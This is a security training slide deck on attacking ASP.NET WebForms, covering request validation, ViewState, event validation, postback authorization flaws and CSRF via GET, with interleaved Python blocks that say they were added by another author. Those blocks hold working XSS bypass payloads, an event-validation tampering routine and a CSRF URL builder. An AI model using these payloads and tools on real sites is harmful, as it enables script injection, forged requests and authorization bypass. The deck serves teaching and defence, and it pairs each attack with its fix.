Page 1: Hacking ASP.Net: Tips and Tricks - sans.org · James Jardine • Principal Security Consultant at Secure Ideas • .Net Developer Since the Beta Release • SANS Instructor and Author

Hacking ASP.Net: Tips and Tricks

James Jardine  [email protected]  (866) 404-7837  @JardineSoftware  ©2013 Secure Ideas LLC | http://www.secureideas.com

Page 2

James Jardine

• Principal Security Consultant at Secure Ideas
• .Net Developer Since the Beta Release
• SANS Instructor and Author
  – Dev544: Secure Coding in .Net
• Open Source Projects
  – Web Config Security Analyzer - http://sourceforge.net/projects/wcsa/
  – EventValMod - http://sourceforge.net/projects/eventvalmod
• Podcaster
  – Professionally Evil Perspective
  – Down the Rabbit Hole
• Blogs
  – .Net Security - http://www.jardinesoftware.net/
  – Gen. Security - http://blog.secureideas.net

Page 3

Topics

• ASP.Net
• Request Validation
• ViewState
• Event Validation
• GET/POST & Postback
• Conclusion

Page 4

ASP.Net

Versions
• 1.1
• 2.0
• 3.0
• 3.5
• 4.0
• 4.5 *

Editions
• WebForms
• MVC
• Web Pages
• Web API
• WCF

Page 5

Testing ASP.Net

• Similar to other technologies
  – GETs/POSTs, etc.
  – AJAX
  – Cookies, Hidden Fields, Forms
  – Session State, Authentication

• Differentiators
  – Request Validation
  – View State
  – Event Validation
  – Other Built-In Controls

Page 6

Request Validation

• Attempt to block XSS attacks
• In 2.0+ it only looks for HTML tag-like patterns, so it only helps in HTML body context (a payload that lands inside an attribute or a script block is not caught)
  – <[letter], <!, <?, </, &#
• Prior to 2.0 most likely disabled

Page 7

Request Validation Bypass

• Not really!
• If the database stores the data as varchar (not nvarchar)
• Use the Unicode fullwidth form %uFF1C (U+FF1C, fullwidth less-than sign) in place of <
• Request Validation doesn't detect this, but...
• The database's implicit conversion to the varchar code page maps it to a plain < character, so the stored value comes back out as a real tag

Of course output encoding blocks this as well

Page 8

Request Validation Bypass 2

• Addition of a % character (<%tagname>)
• Reported to work in IE (I was unsuccessful)
• Reported by Zamir Paltiel (http://www.securityfocus.com/archive/1/524043)
• An older bypass was to use a null character, like <%00tagname>
• Browser specific and doesn't really work anywhere

Of course output encoding blocks this as well
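To make the bypasses on slides 7 and 8 concrete, here is an added Python example of my own (not code from the deck, from Secure Ideas, or from Microsoft) that models the path a payload takes: a reconstruction of the 2.0+ request validation patterns listed on slide 6, a stand-in for SQL Server's implicit NVARCHAR-to-VARCHAR best-fit conversion, and the output encoding that closes the hole. Assumptions: the validation rule is rebuilt from the slide's pattern list rather than taken from Microsoft's source; NFKC normalisation plus a cp1252 round trip is used as a proxy for the Windows best-fit table (the two agree for the fullwidth ASCII block); the payloads are constructed for the demonstration.

```python
import html
import unicodedata


def is_dangerous_string(value: str) -> bool:
    """Approximation of the ASP.NET 2.0+ request validation check (assumption:
    reconstructed from the patterns listed on slide 6, not Microsoft's code).
    A '<' followed by an ASCII letter, '!', '/' or '?', or an '&' followed by
    '#', is what raises HttpRequestValidationException."""
    for i in range(len(value) - 1):
        ch, nxt = value[i], value[i + 1]
        if ch == "<" and ((nxt.isascii() and nxt.isalpha()) or nxt in "!/?"):
            return True
        if ch == "&" and nxt == "#":
            return True
    return False


def store_in_varchar_column(value: str) -> str:
    """Simulates SQL Server implicitly converting an NVARCHAR parameter into a
    VARCHAR column: code points outside the column's code page are "best fit"
    mapped to their closest look-alike, so U+FF1C silently becomes '<'.
    Assumption: NFKC normalisation plus a cp1252 round trip stands in for the
    Windows best-fit table; for the fullwidth ASCII block the two agree."""
    folded = unicodedata.normalize("NFKC", value)
    return folded.encode("cp1252", errors="replace").decode("cp1252")


def html_encode(value: str) -> str:
    """Output encoding for HTML body context (what HttpUtility.HtmlEncode does):
    this is the control that actually stops the stored payload."""
    return html.escape(value, quote=True)


def walk_payload(payload: str) -> dict:
    """Run one submitted value down the whole path:
    request validation -> varchar storage -> rendering raw vs. encoded."""
    if is_dangerous_string(payload):
        return {"blocked_by_request_validation": True}
    stored = store_in_varchar_column(payload)
    return {
        "blocked_by_request_validation": False,
        "stored": stored,
        "rendered_raw": stored,                   # e.g. lblName.Text = stored
        "rendered_encoded": html_encode(stored),  # HttpUtility.HtmlEncode(stored)
        "raw_contains_script_tag": "<script" in stored.lower(),
    }


# Constructed payloads for the cases on slides 7 and 8 (not from the deck)
PLAIN = "<script>alert(1)</script>"                           # caught by request validation
FULLWIDTH = "\uff1cscript\uff1ealert(1)\uff1c/script\uff1e"  # %uFF1C ... %uFF1E: slips through
PERCENT_TAG = "<%img src=x onerror=alert(1)>"                 # <%tagname>: slips through, IE-only in practice
NULL_TAG = "<\x00img src=x onerror=alert(1)>"                 # older <%00tagname> trick: slips through
```

All three bypass payloads pass is_dangerous_string; only the fullwidth one comes back out of the varchar column as a real <script> tag, and html_encode neutralises it either way. When testing a real target, confirm the column type (varchar vs. nvarchar) and that the value renders in HTML body context before reporting the finding.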

Page 9

Request Validation Config

• Set in the Web.Config file
    <system.web>
      <pages validateRequest="true" />
    </system.web>

• Set at the page level
    <%@ Page ValidateRequest="true" %>

• On 4.0+ also check the httpRuntime requestValidationMode setting: in the 4.0 default mode validation is armed for every request before BeginRequest, while requestValidationMode="2.0" restores the 2.0 behaviour of validating only when a page with ValidateRequest="true" reads the input

Page 10

Yes, It's Interesting

Page 11

ViewState

• Base64 encoded by default (encoding, not protection: anyone can decode it)
  – Can be encrypted
• Vulnerabilities
  – Parameter tampering, XSS, information leakage

Page 12

ViewState Manipulation

• ViewStateViewer - http://labs.neohapsis.com/2009/08/03/viewstateviewer-a-gui-tool-for-deserializingreserializing-viewstate/

Page 13

ViewState - Protected

Page 14

The Problem

http://www.codeproject.com/Questions/464873/Validation-of-viewstate-MAC-failed

This is wrong common advice!! The usual answer to a "Validation of viewstate MAC failed" error is to set enableViewStateMac="false", which throws away the tamper protection entirely. The error is almost always a web farm whose servers each auto-generate their own keys; the fix is a matching machineKey (validationKey and decryptionKey) in the Web.config of every server, not disabling the MAC.

Page 15

ViewStateMac

• Provides tamper protection for:
  – ViewState
  – EventValidation

Web.Config
    <pages enableViewStateMac="true"/>

Page level
    <%@ Page Language="C#" EnableViewStateMac="true" ...

Page 16

Event Validation

• Protects drop down lists (and other server controls): a posted value or event must be one the server actually rendered
• Protects against forged postbacks
• Protected by ViewStateMac
• Creates an array of numeric hashes
• Not user specific
  – Doesn't protect against CSRF

<input type="hidden" name="__EVENTVALIDATION" value="/wEWBALslL0qAu3wv7QBAqnOkfQNAoznisYG"/>

Page 17

Event Validation - EventValMod

• Modifies the Event Validation field
• Stand alone app / written in .Net
• http://sourceforge.net/projects/eventvalmod
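The ViewState manipulation slide (page 12) and the two Event Validation slides (pages 16 and 17) rest on one fact: both fields are ObjectStateFormatter output, base64 on the wire, and without a MAC anyone can decode, edit and re-encode them. The following is an added Python example of mine (not the deck's code, and not EventValMod or ViewStateViewer) that decodes the __EVENTVALIDATION value shown on slide 16, reports whether a MAC trails the serialized object, and performs the EventValMod-style edit of appending a control hash. Assumptions: the token values are recalled from the .NET Framework reference source and cover only the subset common in real pages; the trailer lengths quoted for HMACSHA1 and HMACSHA256 are the usual machineKey validation output sizes.

```python
import base64

# Tokens of System.Web.UI.ObjectStateFormatter, the "LOS" format behind __VIEWSTATE
# and __EVENTVALIDATION (assumption: recalled from the .NET reference source; only
# the tokens common in real pages are handled, anything else raises with its offset).
CONST = {0x64: None, 0x65: "", 0x66: 0, 0x67: True, 0x68: False}
INT32, STRING, PAIR, TRIPLET, ARRAYLIST, ISTR_ADD, ISTR_REF = 0x02, 0x05, 0x0F, 0x10, 0x16, 0x1E, 0x1F
SAMPLE = "/wEWBALslL0qAu3wv7QBAqnOkfQNAoznisYG"  # the __EVENTVALIDATION value on slide 16


class LosReader:
    """BinaryReader conventions: 7-bit encoded ints, length-prefixed UTF-8 strings."""
    def __init__(self, data: bytes):
        self.data, self.pos, self.istrings = data, 0, []

    def take(self, n: int) -> bytes:
        chunk = self.data[self.pos:self.pos + n]
        if len(chunk) != n:
            raise ValueError(f"truncated input at offset {self.pos}")
        self.pos += n
        return chunk

    def enc_int(self) -> int:
        value = shift = 0
        while True:
            b = self.take(1)[0]
            value |= (b & 0x7F) << shift
            shift += 7
            if not b & 0x80:
                break
        value &= 0xFFFFFFFF
        return value - (1 << 32) if value >= 0x80000000 else value  # .NET Int32 is signed

    def value(self):
        tok = self.take(1)[0]
        if tok in CONST:
            return CONST[tok]
        if tok == INT32:
            return self.enc_int()
        if tok == STRING:
            return self.take(self.enc_int()).decode("utf-8")
        if tok in (PAIR, TRIPLET):
            return tuple(self.value() for _ in range(2 if tok == PAIR else 3))
        if tok == ARRAYLIST:
            return [self.value() for _ in range(self.enc_int())]
        if tok == ISTR_ADD:  # string appended to the indexed-string table
            self.istrings.append(self.take(self.enc_int()).decode("utf-8"))
            return self.istrings[-1]
        if tok == ISTR_REF:  # back-reference into that table
            return self.istrings[self.enc_int()]
        raise NotImplementedError(f"token 0x{tok:02x} at offset {self.pos - 1}")


def decode_field(b64: str):
    """Return (object, trailer): the trailer is empty with EnableViewStateMac off, else
    the MAC that follows the object (20 bytes HMACSHA1, 32 HMACSHA256; assumption)."""
    raw = base64.b64decode(b64)
    if raw[:2] != b"\xff\x01":
        raise ValueError("no FF 01 header: encrypted ViewState or not an LOS field")
    reader = LosReader(raw)
    reader.take(2)
    obj = reader.value()
    return obj, raw[reader.pos:]


def serialize(obj) -> bytes:
    """Inverse of LosReader for the subset an EventValMod-style edit needs."""
    def enc_int(i: int) -> bytes:
        u, out = i & 0xFFFFFFFF, bytearray()
        while u >= 0x80:
            out.append((u & 0x7F) | 0x80)
            u >>= 7
        return bytes(out) + bytes([u])
    if obj is None:
        return b"\x64"
    if isinstance(obj, bool):
        return b"\x67" if obj else b"\x68"
    if isinstance(obj, int):
        return b"\x66" if obj == 0 else b"\x02" + enc_int(obj)
    if isinstance(obj, str):
        data = obj.encode("utf-8")
        return b"\x05" + enc_int(len(data)) + data if data else b"\x65"
    if isinstance(obj, tuple) and len(obj) in (2, 3):
        return bytes([PAIR if len(obj) == 2 else TRIPLET]) + b"".join(map(serialize, obj))
    if isinstance(obj, list):
        return b"\x16" + enc_int(len(obj)) + b"".join(map(serialize, obj))
    raise NotImplementedError(type(obj).__name__)


def encode_field(obj, trailer: bytes = b"") -> str:
    return base64.b64encode(b"\xff\x01" + serialize(obj) + trailer).decode("ascii")


def add_event_hash(b64: str, control_hash: int) -> str:
    """EventValMod-style edit (assumption: what that tool does, not its code): append a
    control hash so a control the server never rendered validates on postback."""
    hashes, trailer = decode_field(b64)
    if trailer:
        raise ValueError(f"{len(trailer)}-byte MAC present; an edited field would not validate")
    return encode_field(hashes + [control_hash])
```

decode_field(SAMPLE) yields an ArrayList of four Int32 hashes with an empty trailer: that is the "array of numeric hashes" of slide 16, and the empty trailer shows this particular sample was produced with the MAC off. The same field from a page with EnableViewStateMac on decodes to the same list followed by 20 or 32 MAC bytes, and add_event_hash refuses to touch it; an encrypted ViewState fails the FF 01 header check before any parsing happens.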

Page 18

Event Validation - VEHICLE

• ViewState Hidden Event Enumerator
  – Formerly known as ria-scip
• Works with ZAP
• Features
  – Event execution of disabled/invisible controls
  – Server control property injection
  – Edit the ViewState field
  – Error-based control name enumeration
  – ViewState/EventValidation reconstruction
• https://github.com/hacktics/vehicle

Page 19

EventValidation Config

• Set in the Web.Config file
    <system.web>
      <pages enableEventValidation="true" />
    </system.web>

• Set at the page level
    <%@ Page EnableEventValidation="true" %>

Page 20

Bad, Bad, Bad!!

Page 21

ViewStateUserKey

• Protects against Cross Site Request Forgery
  – Provides a per-user "salt" to ViewStateMac, so ViewState captured in the attacker's own session fails validation when replayed in the victim's browser
• Not enabled by default
• Only works for requests with ViewState
  – http://www.testsite.mm/deleteuser.aspx?id=5 (doesn't work)
• Recommendation:

Page 22

Postback

• WebForms are based around "postbacks"
• Caused by events (ex. button_click)
• Triggered by the __VIEWSTATE or __EVENTTARGET form fields

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!Page.IsPostBack)
        {
            // Authorization / populate data: runs on the initial request only
            lblCopy.Text = "copy 2013";
            if (!User.IsInRole("Admin"))
                Response.Redirect("Unauthorized.aspx");
        }
        else
        {
            // Execute events
        }
    }

Page 23

Postback Attacks

• Authorization bypass: the role check only runs on the initial request, so a crafted postback (any request carrying a __VIEWSTATE field) skips it
    if (!User.IsInRole("Admin"))
        Response.Redirect("Unauthorized.aspx");

  Recommendation:
  – Check authorization on every request

• XSS (ViewState tampering): the label text is set once and then round-trips through ViewState, so without a MAC the client can replace it with script
    lblCopy.Text = "copy 2013";

  Recommendation:
  – Enable ViewStateMac
  – Set text on every request

Page 24

GET/POST Exchange

• Server control GETs and POSTs are interchangeable
  – TextBox
  – ListBox
  – ViewState/EventValidation
  – Etc.
• Based on request type: the page reads its values from Request.Form for a POST and from Request.QueryString otherwise
• Can call POST requests with GET
  – Good for CSRF
• Can trigger a postback with a GET request
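As an added example of the GET/POST interchange and the GET-triggered postback (my own code, not from the deck), the Python below parses a WebForms page, keeps its hidden __VIEWSTATE and __EVENTVALIDATION fields, and rebuilds the POST postback as a single GET URL, firing either a submit Button (by including its name) or any other control (by naming it in __EVENTTARGET, as __doPostBack() does). Assumptions: the HTML page, deleteuser.aspx, the hidden values and the control names are constructed for the demonstration, with the hostname taken from slide 21; the resulting URL only does damage when ViewStateUserKey is not set (otherwise the attacker's captured ViewState fails the victim's MAC) and when the handler doesn't check Request.RequestType.

```python
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import parse_qs, urlencode, urljoin, urlparse


class WebFormsForm(HTMLParser):
    """Collects the action and every <input> (name -> (type, value)) of the first
    <form> on a WebForms page: hidden ViewState/EventValidation fields, text boxes
    and submit buttons."""

    def __init__(self):
        super().__init__()
        self.action, self.fields, self.in_form, self.done = "", {}, False, False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and not self.in_form and not self.done:
            self.action, self.in_form = a.get("action") or "", True
        elif tag == "input" and self.in_form and a.get("name"):
            self.fields[a["name"]] = ((a.get("type") or "text").lower(), a.get("value") or "")

    def handle_endtag(self, tag):
        if tag == "form" and self.in_form:
            self.in_form, self.done = False, True


def postback_as_get(page_html: str, page_url: str, trigger: str,
                    overrides: Optional[dict] = None) -> str:
    """Rebuild the page's POST postback as one GET URL. Server controls read their
    values from Request.Form or Request.QueryString depending on the request type,
    so the same field names work in a query string. A submit Button fires when its
    own name is present; anything else (LinkButton, AutoPostBack DropDownList) is
    fired the way __doPostBack() does, by naming it in __EVENTTARGET. __VIEWSTATE
    and __EVENTVALIDATION are forwarded untouched so the MAC still validates."""
    form = WebFormsForm()
    form.feed(page_html)
    params = {}
    for name, (itype, value) in form.fields.items():
        if itype == "submit" and name != trigger:
            continue                        # only the chosen button may "click"
        params[name] = value
    if form.fields.get(trigger, ("", ""))[0] != "submit":
        params["__EVENTTARGET"] = trigger
        params["__EVENTARGUMENT"] = ""
    params.update(overrides or {})
    return urljoin(page_url, form.action) + "?" + urlencode(params)


def query_params(url: str) -> dict:
    """Split a built URL back into its parameters (blank values kept)."""
    return parse_qs(urlparse(url).query, keep_blank_values=True)


# Constructed WebForms page, not a real application: deleteuser.aspx, the control
# names and the __VIEWSTATE value are made up; __EVENTVALIDATION is the slide 16 sample.
SAMPLE_PAGE = """
<form method="post" action="deleteuser.aspx" id="form1">
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEyMzQ1Njc4OWRk" />
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALslL0qAu3wv7QBAqnOkfQNAoznisYG" />
<input name="txtUserId" type="text" value="" id="txtUserId" />
<input type="submit" name="btnDelete" value="Delete" id="btnDelete" />
<input type="submit" name="btnCancel" value="Cancel" id="btnCancel" />
<a id="lnkDelete" href="javascript:__doPostBack('lnkDelete','')">Delete</a>
</form>
"""
PAGE_URL = "http://www.testsite.mm/deleteuser.aspx"   # host from slide 21
```

The URL that comes back can be dropped into an <img src> or a link for CSRF. Two practical limits: a large ViewState can exceed the default 2048-byte maxQueryString limit of IIS, and request validation still runs over the query string, so any injected values are subject to the rules on slide 6.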

Page 25

GET/POST Fix

• WebForms
    if (Request.RequestType == "POST")

• MVC
    [HttpPost]
    public ActionResult DoSomething()

Page 26

Authentication Cookie

• HttpOnly (hard coded: the forms authentication cookie is always issued with HttpOnly)
• Secure flag may not be set
  – Sometimes there is an error if behind a load balancer that strips SSL (with requireSSL="true" the server refuses to issue the cookie over a connection it sees as plain HTTP)
  – Should recommend manually setting this value
• Self-contained
  – Not tracked on the server
  – Timeout is key. It lives until the timeout in the ticket expires
  – FormsAuthentication.SignOut only removes the cookie from the browser (it doesn't invalidate the ticket, so a captured cookie keeps working until the timeout)

Page 27

Misc. Files

• Trace.axd
• Elmah.axd
• Use URL authorization in the Web.config (a <location> element for the handler that denies anonymous users) to restrict them
• Web.config (crown jewels)
  – GOOD LUCK!!
  – IIS is set up to not serve this file

Page 28

Conclusion

• ASP.Net has good security features
  – You have to understand them
• ViewStateMac is IMPORTANT!
  – EventValidation
  – ViewState
  – ViewStateUserKey
• Developers are not up to speed on these things
  – Share this info with developers

Page 29

Hacking ASP.Net: Tips and Tricks

James Jardine  [email protected]  (866) 404-7837  @JardineSoftware  ©2013 Secure Ideas LLC | http://www.secureideas.com

